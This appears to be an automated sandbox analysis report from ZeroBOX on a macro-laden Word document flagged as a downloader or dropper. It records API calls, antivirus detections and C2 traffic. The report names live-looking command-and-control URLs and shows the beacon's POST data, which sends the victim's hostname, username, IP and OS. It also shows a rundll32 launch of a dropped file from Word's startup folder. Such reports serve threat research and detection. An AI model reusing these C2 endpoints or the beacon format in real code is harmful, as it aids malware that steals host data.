Summary | ZeroBOX

0520_2812845003972.doc

VBA_macro OS Processor Check MSOffice File
Category Machine Started Completed
FILE s1_win7_x6401 May 21, 2021, 1:36 p.m. May 21, 2021, 1:39 p.m.
Size 1.1MB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 20 10:16:00 2021, Last Saved Time/Date: Thu May 20 10:16:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
MD5 aecae614ceb5f5c3dac0e00c773acb6d
SHA256 a856857b48a4fc929504097cfdfde8d3ce54953995fff31b2a3adab28a994890
CRC32 31A3C3CD
ssdeep 24576:MEIjrPUaphvGvGUZ93/semhXp7AsW7aHESKbhweYkTfBR0:M/jhvGvGU93097AF7sESKyeYkTfB
Yara
  • OS_Processor_Check_Zero - OS Processor Check
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Microsoft_Office_File_Zero - Microsoft Office File

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49205 -> 54.221.236.13:80 2021997 ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
suspicious_features POST method with no referer header suspicious_request POST http://vaethemanic.com/8/forum.php
suspicious_features POST method with no referer header suspicious_request POST http://tembovewinated.ru/8/forum.php
suspicious_features POST method with no referer header suspicious_request POST http://prournauseent.ru/8/forum.php
request GET http://api.ipify.org/
request POST http://vaethemanic.com/8/forum.php
request POST http://tembovewinated.ru/8/forum.php
request POST http://prournauseent.ru/8/forum.php
request POST http://vaethemanic.com/8/forum.php
request POST http://tembovewinated.ru/8/forum.php
request POST http://prournauseent.ru/8/forum.php
domain tembovewinated.ru description Russian Federation domain TLD
domain prournauseent.ru description Russian Federation domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c9b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ca05000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c9a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c971000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c851000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b031000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b034000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b291000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0a660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0a660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0a670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1016
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0a680000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x507c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b617000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b4e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b4a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b461000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b441000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b391000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72551000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b371000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76891000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b351000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b341000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c7b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b331000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b311000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b2e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b2d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b2b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b2a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b271000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b231000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c9a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c7a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 16384
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b64a000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 77824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73730000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e74000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72472000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x724e1000
process_handle: 0xffffffff
1 0 0
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\~$20_2812845003972.doc
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000198
filepath: C:\Users\test22\AppData\Local\Temp\~$20_2812845003972.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$20_2812845003972.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 0
family: 2
1 0 0
Symantec ISB.Suspexec!gen29
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Tencent Heur.Macro.Generic.d.378f60c7
TrendMicro HEUR_VBA.DE
McAfee-GW-Edition BehavesLike.OLE2.Downloader.tb
Sophos Mal/EncPk-ABL
Ikarus Trojan-Dropper.VBA.Agent
Microsoft Program:Win32/Wacapew.C!ml
TACHYON Suspicious/W97.NS.Gen
BitDefenderTheta Gen:NN.ZedlaF.34690.Eu4@aKxQvvii
com_class Scripting.FileSystemObject May attempt to write one or more files to the harddisk
cve CVE-2013-3906
parent_process winword.exe martian_process rundll32.exe c:\users\test22\appdata\roaming\microsoft\word\startup\rem.r,ESLMJYVFMJX
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=2005_mesbn&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=2005_mesbn&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0
file C:\Users\test22\AppData\Local\Temp\fax.f